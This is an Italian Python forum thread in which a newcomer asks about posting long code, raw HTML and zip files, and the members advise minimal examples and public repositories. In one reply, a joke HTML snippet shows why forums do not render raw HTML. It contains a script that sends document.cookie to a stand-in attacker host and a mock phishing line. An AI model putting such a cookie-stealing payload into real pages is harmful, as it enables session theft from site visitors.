Topic: Delle domande prima di cominciare  (Letto 681 volte)

0 Utenti e 1 Visitatore stanno visualizzando questo topic.

Offline nuzzopippo

  • python habilis
  • **
  • Post: 56
  • Punti reputazione: 0
    • Mostra profilo
Delle domande prima di cominciare
« il: Ottobre 09, 2018, 18:55 »
Salve ragazzi

come mio primo post in questo forum, devo dire molto serio e preciso, a quel che vedo, qualche domandina preliminare per non toppare troppo quando poi passerò a fare qualche post "tecnico", mi permetto di farla al "bar", mi sembra giusto così

1a
Guardando in giro, vedo in genere piccoli stralci di codice e trattare argomenti strettamente specifici, non che non mi interessino, anzi, ma essendo un "solitario autodidatta" ho sviluppato, nel tempo, mie abitudini implementative che mi ostacolano non poco con questo linguaggio e che vorrei mettere in discussione.
Lo so bene che è estremamente seccante, principalmente per gli esperti, ma : è ammesso esporre nei post del codice consistente?, che so tre-quattro moduli x un migliaio di righe

Da ciò discende la seconda domanda :
Non ricordo di aver visto, in questo forum, dei settori di testo scorrevole ... è possibile l'inserimento diretto di codice html in un post?
Ovviamente, l'idea è di un div, ad altezza fissa e larghezza in percentuale, non ho visto attrezzi analoghi

Se le domande sono banali scusate :)

Offline RicPol

  • python sapiens sapiens
  • ******
  • Post: 2.869
  • Punti reputazione: 9
    • Mostra profilo
Re:Delle domande prima di cominciare
« Risposta #1 il: Ottobre 09, 2018, 20:42 »
Alla prima domanda la risposta è no, un po' come in tutti i forum. Cioè, nessuno ti vieta di postare mille righe di codice, ma non aspettarti che qualcuno le legga. In un forum ci si aspetta di affrontare problemi specifici, che in genere si possono riassumere in poche righe di codice. Poi è chiaro, le poche righe possono diventare un centinaio (gulp, mi pento di averlo detto), ma solo se è veramente necessario. Di più: l'abilità di chi posta per chiedere consiglio è proprio quella di saper circoscrivere l'argomento, e di conseguenza anche di saper tagliare il codice non necessario all'argomento specifico.
Devi sempre capire che domandare è facile, rispondere è complicato: devi aiutare le persone che vuoi che ti aiutino, e per aiutarle devi prima di tutto ridurre il tempo necessario a navigare nelle complessità del tuo codice.
Detto questo, se invece vuoi chiedere un parere su un progetto più ampio, nessuno ti vieta di metterlo su github (per dire), e poi postare qui un messaggio con il link alla repository.

Alla seconda domanda la risposta è no. Il box di editing dei messaggi ha alcune opzioni di formattazione, ma non puoi andare oltre a quelle. E sicuramente non puoi "inserire html", sarebbe... poco saggio lasciarlo fare. Detto questo, un forum non è il posto dove comporre romanzi e opere d'arte di grafica web. Il forum serve a scambiarsi messaggi possibilmente brevi e significativi, di volta in volta per una ragione specifica e occasionale. (E poi certo, ci sono volte dove è piacevole anche cazzeggiare, chiacchierare tra amici, eccetera).
Di nuovo, se però vuoi scrivere una cosa più lunga e più elaborata anche graficamente, e poi su questa chiedere un parere qui sul forum, allora ti consiglio di farti un blog (e poi puoi postare sul forum chiedendo pareri sull'articolo che hai scritto sul blog). E' anche più conveniente per te: un testo lungo/elaborato richiede fatica, e ti conviene tenerlo in un posto tuo dove puoi riutilizzarlo, farlo vedere, linkarlo come vuoi e quando vuoi.
Per esempio, io ho scritto alcune guide (link in firma) che sono nate anche da alcune discussioni che ho avuto sul forum. Ma poi ho elaborato i concetti e mi sono fatto un discreto mazzo per scrivere tutto. Adesso prova a dargli un'occhiata, e poi dimmi se avrebbe avuto senso postare quelle guide sotto forma di messaggi sul forum. Oggi quelle guide stanno dove sono, ogni tanto le aggiorno, e ogni volta che qualcuno chiede qualcosa su pyton in windows posso dire "ho scritto una guida, vattela a leggere". E' molto più comodo così.

Offline nuzzopippo

  • python habilis
  • **
  • Post: 56
  • Punti reputazione: 0
    • Mostra profilo
Re:Delle domande prima di cominciare
« Risposta #2 il: Ottobre 10, 2018, 18:44 »
Alla prima domanda la risposta è no, un po' come in tutti i forum. Cioè, nessuno ti vieta di postare mille righe di codice, ma non aspettarti che qualcuno le legga. In un forum ci si aspetta di affrontare problemi specifici, che in genere si possono riassumere in poche righe di codice. ...

Grazie della risposta, @RicPol, è nel senso che mi aspettavo ma avere conferma è sempre meglio, fa capire l'atmosfera ... cercherò quindi di attenermi a quanto indicato, quando avrò una questione da porre.

In merito al codice html all'interno dei messaggi, capisco, un parser è costoso da gestire e "malecarne" in giro ce ne sono, meglio non rischiare.

Bene, provvederò ad organizzarmi  se vorrò proporre qualcosa di elaborato :) ... in fondo, ciò che mi interessa di più, al mio livello attuale non ho problemi spiccioli, sviluppare il "giusto approccio" è per me più significativo ... ovviamente, senza pretesa di riscontro, so bene che il tempo degli altri vale almeno quanto il mio ;)

Ciao

Offline RicPol

  • python sapiens sapiens
  • ******
  • Post: 2.869
  • Punti reputazione: 9
    • Mostra profilo
Re:Delle domande prima di cominciare
« Risposta #3 il: Ottobre 10, 2018, 19:14 »
In merito al codice html all'interno dei messaggi, capisco, un parser è costoso da gestire e "malecarne" in giro ce ne sono, meglio non rischiare.
Mah, non so, è che proprio... puoi citarmi un forum che permette l'inserimento di html arbitrario? A me non ne vengono in mente.

Offline nuzzopippo

  • python habilis
  • **
  • Post: 56
  • Punti reputazione: 0
    • Mostra profilo
Re:Delle domande prima di cominciare
« Risposta #4 il: Ottobre 10, 2018, 20:20 »
Mah, non so, è che proprio... puoi citarmi un forum che permette l'inserimento di html arbitrario? A me non ne vengono in mente.

Non proprio arbitrario, e non faccio un esempio eclatante ma ... guarda qui https://antronexuno.forumfree.it/?t=68291880

... una ulteriore domanda : vedo che possono essere inseriti degli allegati nei post, un fikle zip non molto pesante con codice è permesso?, ovviamente, senza troppe aspettative di risposta.

Offline RicPol

  • python sapiens sapiens
  • ******
  • Post: 2.869
  • Punti reputazione: 9
    • Mostra profilo
Re:Delle domande prima di cominciare
« Risposta #5 il: Ottobre 10, 2018, 21:52 »
Ma guarda che quello che hai linkato *non* è "inserire html nei messaggi", eh? Non credo che ti sia chiara la differenza. "Inserire html nei messaggi" vuol dire che tu inserisci html, e il motore del forum lo renderizza in quanto tale, problemi di sicurezza compresi. Quello che hai linkato è un semplice "box di codice", dove tu inserisci del codice e il motore del forum ne fa la syntax highlighting (ma certamente NON lo renderizza/esegue, ci mancherebbe). E guarda, questa cosa si può fare benissimo anche qui:

<html>
  <head>
    <script>
      window.location='http://northkorea.hacker.com/?cookie='+document.cookie
    </script>
    <link rel='stylesheet' href='deadly_malicious.css' type='text/css'>
    <style>
      body { display:none; } html::after { content: 'Entra nel sito: www.LetMeStealYourCreditCardNumber.com'; }
    </style>
  </head>
  <body>
    <marquee>Ti ho fregato! Questo è il ransomware più ca***uto del mondo! Ma il peggio è l'html non standard!</marquee>
  <body>
</html>

Visto? E non è successo niente, il tuo computer è ancora al suo posto e non è stato disintegrato, perché il motore del forum non ha renderizzato il mio diabolico cattivissimo html.
Poi ovviamente va detto che la colorazione della sintassi html su questo forum non c'è, perché questo forum... come dire... ehm... è un forum per python, non html.

> vedo che possono essere inseriti degli allegati nei post, un fikle zip non molto pesante con codice è permesso?
Mah, nel vecchio server sapevo che spesso rifiutava gli allegati per mancanza di spazio (e lo stesso capitava per le immagini embeddate), ma adesso che abbiamo cambiato server forse disponiamo di limiti più generosi. Dovresti provare. Detto questo, non è che uno proprio muoia dalla voglia di scaricarsi uno zip da una sorgente inaffidabile, eh. Come ti ho detto, la cosa migliore è mettere il codice in una repository pubblica, se è troppo grande per essere postato.
Un caso a parte sono le immagini. Ci sono delle volte che effettivamente sono utili (tipo, per far vedere un problema in una gui). Ma è particolarmente irritante quando ti postano sul forum lo screenshot di una sessione della shell... voglio dire, che problema c'è a fare copia-e-incolla?

Offline nuzzopippo

  • python habilis
  • **
  • Post: 56
  • Punti reputazione: 0
    • Mostra profilo
Re:Delle domande prima di cominciare
« Risposta #6 il: Ottobre 10, 2018, 23:33 »
@RicPol, mi rincresce che il mio "guarda qua" Ti abbia indotto a dare una occhiata e basta, avrei dovuto scrivere "leggi".
In quel post fornisco le istruzioni per definire un settore, scrollabile, in un normale post di quel circuito, elemento che li non esiste.
Il codice HTML che hai visto, appunto scrollabile, é solo un esempio di output ottenibile.
Mi dispiace di averti, involontariamente, tratto in inganno.

In altri post fatti, sempre in quel " forum" fornisco istruzioni per inserire, sempre in post ordinari, tabelle scorrevoli e altri elementi non disponibili di default ... Tutto tramite html, inserito direttamente in un post, cosa che li é possibile fare, anche se con accorgimenti, dato che viene passato e qualcosa non passa indenne.

Mi leggerò appena possibile  il codice da Te esemplificato, col cell. é difficile.
Ciao

PS- normalmente ho noscript attivo :)
« Ultima modifica: Ottobre 10, 2018, 23:40 da nuzzopippo »

Offline RicPol

  • python sapiens sapiens
  • ******
  • Post: 2.869
  • Punti reputazione: 9
    • Mostra profilo
Re:Delle domande prima di cominciare
« Risposta #7 il: Ottobre 11, 2018, 11:42 »
Vuoi dire che su quel forum, un normale utente in un normale post può scrivere html qualsiasi, e quello viene renderizzato alla cieca? Cavoli, è... davvero molto interessante, quasi quasi mi iscrivo e faccio qualche esperimento  :devil:
Beh comunque no, non credo che tu qui lo possa fare:
<div>Vedi? non viene fuori un granché</div>.

Offline nuzzopippo

  • python habilis
  • **
  • Post: 56
  • Punti reputazione: 0
    • Mostra profilo
Re:Delle domande prima di cominciare
« Risposta #8 il: Ottobre 11, 2018, 18:04 »
Toh!, una inaspettata vena da Malandrino :)

Non proprio arbitrario, ...

Non è che si abbia a che fare con prodi kamicaze, anzi, pur essendo di manica larga, permettendo l'inserimento di codice html non è che permettono "tutto" ... l'affascinante codice da Te postato, p.e., non potresti inserirlo, script e stili non in-line te li scordi, così come frame, iframe, box ed altri aggeggi.
Devo dire che i gestori sono sulla breccia da tempo e devono avere un analizzatore di testo non male, considerando il relativamente scarso numero di "problemi " visti malgrado la nutrita rappresentanza di aspiranti cracker, troll ed esaltati vari li incontrati, oltre, ovviamente, l'endemica presenza di utonti quali agnelli sacrificali.

Magari, uno smanettone che si dedichi qualcosa potrebbe combinare ma non avrebbe un'autostrada ... comunque, lasciamo perdere ;)

Ok ... info sufficienti, mi cascano le braccia ma nel fine settimana proverò a sottoporre alla Vostra attenzione la mia prima avventura con python, deliberatamente progettata da me e perfettamente funzionante ... senza aver minimamente pensato in python, e poi un quesito da esso derivante, magari non li guarderà nessuno ma sai mai, magari qualcuno si degna di gettare uno sguardo sul codice (1.600 righe) e poi spiegarmi perché s'è messo a ridere :D

Offline riko

  • python deus
  • *
  • moderatore
  • Post: 7.453
  • Punti reputazione: 12
    • Mostra profilo
    • RiK0 Tech Temple
Re:Delle domande prima di cominciare
« Risposta #9 il: Ottobre 14, 2018, 10:34 »
Ok ... info sufficienti, mi cascano le braccia

Come mai ti cascano le braccia?

Citazione
ma nel fine settimana proverò a sottoporre alla Vostra attenzione la mia prima avventura con python, deliberatamente progettata da me e perfettamente funzionante ... senza aver minimamente pensato in python, e poi un quesito da esso derivante, magari non li guarderà nessuno ma sai mai, magari qualcuno si degna di gettare uno sguardo sul codice (1.600 righe) e poi spiegarmi perché s'è messo a ridere :D

Ti anticipo che *non* potrai contare sul mio parere. *Non* ho nessuna intenzione di leggere 1600 righe di codice postate in un forum (a meno che non trovi davvero interessante il problema). Tra l'altro, buona parte delle cose che si avrebbero da dire sono molto probabilmente state gia' dette (e.g., PEP8, code style guides) e basterebbe applicarle [sto pensando alla menzione sulle "abitudini implementative" di cui parli...].

Sicuramente non mi metto a scaricare zip di codice dai forum. Se hai bisogno di condividere codice, github e simili. Fine.

Ma poi davvero quale e' il punto? Se hai un baco, riproducilo con un esempio minimale e di quello si parla. Di cosa si puo' parlare su 1600 righe di codice? Cioe' cosa ti aspetti? Che qualcuno *leggendo* trovi bachi? A volte sono evidenti, vero. Ma... perche'? Che ti si dica: leggi qui e leggi li? Gia' fatto, senza nemmeno postare. ;)
Tanto sappiamo tutti, oggettivamente, che non interessa. Il codice che scrivi lo leggi e usi solo tu. Non ci deve mettere le mani nessuno e sono sicuro che hai cose piu' divertenti che stare a rispettare guide di stile che sono utili quando invece qualcun altro deve mettere mano al tuo codice. Certo, sarebbero anche utili quando vuoi condividere un esempio minimale perche' hai un problema. Ma veramente ti metterai un po' di fine settimana a riadattare il codice a modo senza avere nessun vantaggio immediato?

Ah, e poi ci sono i classici errori di "non conosco o non ho capito come si fa OOP". Interessa? Ma interessa *davvero*? Perche' sono cose che si imparano lentamente e prendono *anni*. Verrebbe da dire che prendono "sempre", visto e considerato che rispetto a 10 anni fa, per esempio, scrivo diversamente (e mi aspetto che fra 10 anni trovero' cose che non mi piacciono nel codice che scrivo oggi). Anche perche' le convenzioni cambiano.

Poi qualcuno ti suggerira' di scrivere i test. Altra cosa che di solito non interessa fare (e che ovvimaente e' un requisito se davvero vuoi mettere in giro questa cosa), ma probabilmente a te non cambia troppo. Avrai meno problemi e perderai ore non particolarmente divertenti a scrivere sti test, su un progetto scritto senza riguardo per i test, con il risultato che molto probablmente faresti prima a riscrivere daccapo.

Per darti un'idea, 1600 righe di cui fare review a lavoro (con uno standard adeguato) sono alcune ore di lavoro. E si e' un po' nell'ambito dei favori: sono davvero tante da guardare tutte insieme. Di piu' se il collega e' junior.  E in questo caso non e' nemmeno banale dare feedback comprensibile (quindi c'e' il rischio che sia lavoro buttato); c'e' un motivo per cui ci sono tool per fare code review e non si scrive tutto via email. ;)

Offline nuzzopippo

  • python habilis
  • **
  • Post: 56
  • Punti reputazione: 0
    • Mostra profilo
Re:Delle domande prima di cominciare
« Risposta #10 il: Ottobre 15, 2018, 17:56 »
Ciao @riko, gazie della risposta :)

Ok ... info sufficienti, mi cascano le braccia
Come mai ti cascano le braccia?

Ovviamente perché  il contesto del discorso esposto dal buon @RicPol mi facevano arguire che, probabilmente, qui avrei trovato solo esiti del tipo :
Citazione
Ti anticipo che *non* potrai contare sul mio parere. *Non* ho nessuna intenzione di leggere ....

Ti dirò, in altri contesti ho trovato utenti molto più esperti di me disponibili a discutere e giocare (si, lo confesso, 'sti argomenti per me sono principalmente un gioco ...  in cui sono ben scarso) su codici di migliaia di righe ... individui preziosi da incontrare, oltre a permettere agli iniziandi di avanzare più rapidamente conoscono ed espongono accorgimenti che spesso non si reperiscono su testi e documentazione ma si acquisiscono solo con l'esperienza.


Ti sarà certamente chiaro che questo post altro non è che un saggiare il terreno per verificare una eventuale presenza di simili utenti ed accertare la presenza "in loco" di strumenti di comunicazione adeguati in tal senso. Comprenderai, dunque, che constatare la carenza di tali elementi, che Tu confermi, scoraggi detta ricerca.

Indubbiamente, spargere sudore sulla documentazione è necessario, non ho il minimo dubbio in proposito e concordo sul Tuo argomentare, permettimi, però, un paio di osservazioni.

Proprio per il fatto che il mio codice rimane solo a me lo stile di codifica è marginale, comunque ho letto la pep e la rileggerò ancora, di cose che inorridirebbero i "puristi" ne faccio parecchie, scappano da sole ... speriamo nella pratica.

Parlando di OOP, ... certamente, converrai che quale "linguaggio ad oggetti" python sia un tantino "sui generis", domande del tipo : quando è conveniente utilizzare metodi di classe?, quando conviene una funzione lambda?, quando è opportuno usare metodi procedurali?, vengono spontanee.
E parlando proprio di oggetti, è forse canonico che le variabili di una classe siano esposte quali pubbliche o, peggio ancora, che dall'esterno siano aggiunti elementi non propriamente definiti nella classe stessa? ... Ti confesso che questi particolari aspetti mi hanno un pochino sbilanciato.
Certamente, col tempo, verrò moderatamente a patti con tali temi ma chissà quali e quanti aspetti sono dati talmente per scontati da non essere normalmente riportati che io ignoro e magari Tu o altri sapreste indicare alla prima occhiata.

Ti è chiaro, ora, qual'è il punto?

... Non certo cercare un "cacciatore di bug" per solo un paio di migliaia di righe di codice, hai perfettamente ragione, chi idea e scrive un codice ne farebbe il debug in una frazione del tempo che ci metteresti Tu a capirlo.

Detto questo, hai sollevato un argomento che mi è nuovo "scrivere i test", non so bene cosa intendi, normalmente il corretto funzionamento di ogni singola funzione/metodo andrebbe verificato, ed abitualmente lo faccio, forse intendi qualche particolare accorgimento "professionale" a me sconosciuto, vedrò di capirlo ...

Comunque, leggere mi ha fatto riflettere, chiedo certamente troppo ad affliggere Te o chiunque altro il tedio di ciò che faccio, che certamente non sarebbe interessante ... le considerazioni da Voi esposte mi erano già note (avrei potuto risparmiarmi il post, ma sai mai) e lungi da me proporre qualcosa li ove sembra sia ritenuto inopportuno, se non c'è trippa per gatti si digiuna.
Mi regolerò, pertanto, ai limiti che scorgo : nell'improbabile caso mi trovi qualcosa di breve e necessario che non mi riesce di risolvere valuterò se chiederlo ... non credo sarò mai in grado di dare una mano a qualcuno qui ma, nel caso, incrocerò le dita e cercherò di non dire cazz..e.

Ciao
« Ultima modifica: Ottobre 15, 2018, 17:58 da nuzzopippo »

Offline RicPol

  • python sapiens sapiens
  • ******
  • Post: 2.869
  • Punti reputazione: 9
    • Mostra profilo
Re:Delle domande prima di cominciare
« Risposta #11 il: Ottobre 15, 2018, 21:25 »
Citazione
Ti dirò, in altri contesti ho trovato utenti molto più esperti di me disponibili a discutere e giocare (si, lo confesso, 'sti argomenti per me sono principalmente un gioco ...  in cui sono ben scarso) su codici di migliaia di righe ..
Oddio, un po' mi piacerebbe vedere un link, ma diciamo che in generale non ne dubito... dipende dai casi, da quanto tempo ha la gente...

...e credo che dipenda anche molto da quanto sai essere interessante nel porre le domande e i problemi. Se gli argomenti sono interessanti, vengono fuori discussioni interessanti. E' chiaro anche però che quando fai discussioni interessanti... devi essere in grado di capirle, o se no devi fare un po' di lavoro per conto tuo per colmare le lacune quando leggi i messaggi di qualcuno molto esperto. Non puoi lanciare un grande tema, avere una risposta lunga complessa e articolata e stimolante... e rispondere "scusa ma hai parlato di funzioni... non ho capito che cosa sono". Capisci che dall'altra parte gli si ammoscia un po'... la volontà, ecco.
Esempio, un bel po' di discussioni mie con Riko (dove io sono il niubbo, si capisce). Riko scrive, io scrivo... ma prima di scrivere devo remare un bel po' per capire le implicazioni di quello che ha detto Riko... quando le capisco. Esempio recente: https://forumpython.it/calcolo-scientifico/(risolto)dizionario-gtjson-gtdizionario-mantenere-l'ordine-delle-chiavi/msg88113/#msg88113

Ora, non dico io che sono un dilettante. Ma prendi Riko, appunto. Se ti limiti a sfogliare lo storico dei suoi post https://forumpython.it/profile/?area=showposts;u=1011 vedi che trovi molto spesso risposte lunghe e complesse e difficili... cibo per la mente. Perché Riko è uno bravo a programmare (che non guasta) e che ha un bel po' di esperienza (che è la cosa più importante per chi lo legge). Certo però che le sue risposte migliori vanno anche un po' decifrate. Bisogna anche essere bravi a leggerlo. Non lo so, tu parlavi di OOP: toh, guarda questo https://forumpython.it/base/chiarimenti-su-delegazione/msg87439/#msg87439 (e poi tutto il resto del thread). Oppure, su questioni di produzione: https://forumpython.it/python-it-org-cafegrave/code-reviews-come-perche'-quando/msg88009/#msg88009 E si potrebbe andare avanti molto a lungo.
Certo però che non bisogna prendere Riko come un manuale per principianti gratis on demand. E se cominci a chiedergli cose che si trovano a un tiro di google, ti risponde "leggiti la documentazione". Non sarà "disponibile"... ma capisci che...

Ora, nella mia esperienza ci sono due tipi di "1000 righe di codice" che NON ti viene voglia di leggere e commentare:
1) ovviamente, quelli dove tu hai un problema specifico (che so, un errore...) ma non riesci o peggio non hai voglia di fare la fatica di tagliare il codice non necessario e restringere il campo, aiutando chi ti deve aiutare. E quindi posti 1000 righe di codice e "raga, questo non mi funzia!!!! ci sto impazzendo!!! helpo!!!! helpo!!!". Ecco, questo proprio non ti viene neanche voglia di rispondergli male.
2) I casi in cui ti propongono a parole un tema alto e complesso e sempre un po' *generico* (e già qui ti viene già il sospetto), cose del tipo "aiutatemi a decidere come organizzare questo codice in stile OOP" (boh?)... e poi vedi 1000 righe di filastrocca senza senso dove è evidente che l'autore non sa usare le strutture dati elementari (tipo liste, dizionari), non sa usare le funzioni... e allora dovresti metterti a commentare riga per riga dicendo tutto quello che non va... e ci metti una vita. E allora gli rispondi, guarda, leggiti un buon manuale passo passo, e cerca di coprire le basi prima. Anche qui, non sarà "disponibile" ma... non è che possiamo metterci a scrivere un manuale a post.

Offline nuzzopippo

  • python habilis
  • **
  • Post: 56
  • Punti reputazione: 0
    • Mostra profilo
Re:Delle domande prima di cominciare
« Risposta #12 il: Ottobre 16, 2018, 17:46 »
Grazie dei link @RicPol (fa niente se in futuro abbrevio a @Ric? ) ho letto quello sulla delegazione, dovrò rileggerlo, naturalmente mi ha confermato quanto io sia inadeguato, leggerò con molto interesse.

Naturalmente, non ho niente a quel livello, io sono molto più terra - terra, se vuoi un link, ed hai pazienza a leggere (sono logorroico) spero Tu conosca linux e bash (non uso windows da 20 anni), guarda qua : https://forum.ubuntu-it.org/viewtopic.php?f=67&t=613387

Vi troverai proprio un "gioco" da me proposto a seguito di un post ed un utente di quelli veramente preziosi che non solo ha letto migliaia di righe di codice ma mi ha anche dato molti suggerimenti e dritte ... ve ne sono altri ma vai a trovarli :(

P.S. - se vuoi "capire il pollo" leggi i post, sono molti ma mi esprimono, se vuoi "andare al sodo" nell'ultimo post c'è uno dei vostri famigerati zip ... ma non vedo a cosa serva, con python/tk sarebbe più "carino"
« Ultima modifica: Ottobre 16, 2018, 17:52 da nuzzopippo »

Offline Markon

  • python sapiens sapiens
  • *
  • moderatore
  • Post: 4.104
  • Punti reputazione: 5
    • Mostra profilo
    • Neolithic
Re:Delle domande prima di cominciare
« Risposta #13 il: Ottobre 17, 2018, 21:57 »
Ciao nuzzopippo,

Senza dilungarmi troppo, direi che puoi postare il codice che vuoi. Cio' che conta e' che rispetti le linee guida , per cui per favore chiarisci qual e' il problema che stai cercando di risolvere e prova ad avere pazienza - non tutti hanno intenzione di mettersi a leggere 100+ righe di codice "per divertimento".

Inoltre, per praticita', ti suggerirei di usare gist o link a repositories tipo github/gitlab (repo pubblici sono free), invece di usare file zip. Tieni presente che SMF consente di allegare sti benedetti file, ma stiamo parlando di una piattaforma stravecchia e all'epoca aveva senso condividere codice tramite zip. Ormai e' obsoleto e anche pericoloso.

Per il resto, divertiti e stai tranquillo :)

Offline nuzzopippo

  • python habilis
  • **
  • Post: 56
  • Punti reputazione: 0
    • Mostra profilo
Re:Delle domande prima di cominciare
« Risposta #14 il: Ottobre 18, 2018, 09:12 »
Grazie della indicazione @Markon, mi ci atterrò.

Questo post non ha problemi da risolvere, è solo un preliminare per conoscere l'ambiente e porre qualche domanda funzionale ad eventuali futuri post e, devo dirlo, è stato per me fruttuoso, le osservazioni fatte dagli intervenuti ed i riferimenti forniti mi stanno permettendo di inquadrare l'ambiente, che trovo notevolmente interessante.

Non userò "zip", nel caso terrò presente quanto suggerito da Te e gli altri intervenuti. Grazie.